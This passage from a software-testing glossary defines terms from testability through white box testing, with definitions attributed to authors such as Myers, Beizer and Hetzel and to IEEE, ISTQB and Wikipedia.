Normally the term "testability" refers to the ease or cost of testing, or the ease of testing with the tools and processes currently in use.So, a feature might be more testable if you have all the right systems in place, and lots of time.Or it might not be very testable, because you have reached a deadline, and have run out of time and/or money.Sometimes, the term "testability" refers to requirements. There, it's used as a measure of clarity, so that you can know if the test of a requirement passes or fails.So, "the UI must be intuitive and fast" may not be very "testable", without knowing what is meant by "intuitive" and how you would measure "fast enough".

Testing
Testing is the process of executing a program with the intent of finding errors. [G. Myers]
The act of designing, debugging and executing tests. [B. Beizer]
Testing is any activity aimed at evaluating an attribute or capability of a program or system and determining that it meets its required results. [B. Hetzel]
The process of executing a software system to determine whether it matches its specification and executes in its intended environment. [J. Whittaker]
The process of operating a system or component under specified conditions, observing or recording the results, and makng an evaluation of some aspect of the system or component. [IEEE]
Testware
Software, and sometimes data, used for testing.
Thread Testing
Testing which demonstrates key functional capabilities by testing a string of units that accomplish a specific function in the application.
Unit
The smallest thing that can be tested. It (usually) begins as the work of one programmer and corresponds to the smallest compilable program segment, such as a subroutine. A unit, as a tested object, does not usually include the subroutines or functions that it calls, fixed tables, and so on. [B. Beizer]
Unit Testing
Testing of units. In unit testing, called subroutine and function calls are trested as if they are language parts (e.g. keywords). Called and calling components are either assumed to work correctly or are replaced by simulators. Unit testing usually is done by the unit's originator. [B. Beizer]
Testing of individual programs as they are written. [B. Hetzel]
The testing of individual software components or a collection of components. [J. Whittaker]
Usability Testing
Testing to determine the extent to which the software product is understood, easy to learn, easy to operate, and attractive to the users under specified conditions. [ISTQB]
Use Case
In software engineering, a use case is a technique for capturing the potential requirements of a new system or software change. Each use case provides one or more scenarios that convey how the system should interact with the end user or another system to achieve a specific business goal. Use cases typically avoid technical jargon, preferring instead the language of the end user or domain expert. Use cases are often co-authored by software developers and end users. [wikipedia]
User Acceptance Testing
A formal product evaluation performed by a customer as a condition of purchase.Formal testing of a new computer system by prospective users. This is carried out to determine whether the software satisfies its acceptance criteria and should be accepted by the customer.User acceptance testing (UAT) is one of the final stages of a software project and will often be performed before a new system is accepted by the customer. [wikipedia]
User Interface
The user interface (also known as Human Computer Interface or Man-Machine Interface (MMI)) is the aggregate of means by which people interact with the system. The user interface provides means of input and output. [wikipedia]
User Interface Freeze
The point in time in the development process in which no changes whatsoever are permitted to the user interface. Stability of the UI is often necessary for creating Help documents, screenshots, marketing materials, etc.
Validation Testing
The process of evaluating software at the end of the development process to ensure compliance with requirements. [B. Hetzel]
Validation Testing
The process of evaluating an object to deomstrate that it meets requirements. [D. Wallace]
Verification
The process of evaluating a system or component to determine whether the products of the given development phase satisfy the conditions imposed at the start of that phase. [IEEE]
Evaluation performed at the end of a phase with the objective of ensuring that the requrements established during the previous phases have been met. (More generally, verification refers to the overall software evaluation activity, including reviewing, inspecting, testing, checking, and auditing). [B Hetzel]
Volume Testing
Subjecting the program to heavy volumes of data. [G. Myers]
Walkthrough
A review process in which the designer leads one or more others through a segment of design or code he or she has written. [B. Hetzel]
White Box Testing
Testing done under structural testing strategy. (also called Glass Box Testing) [B. Beizer]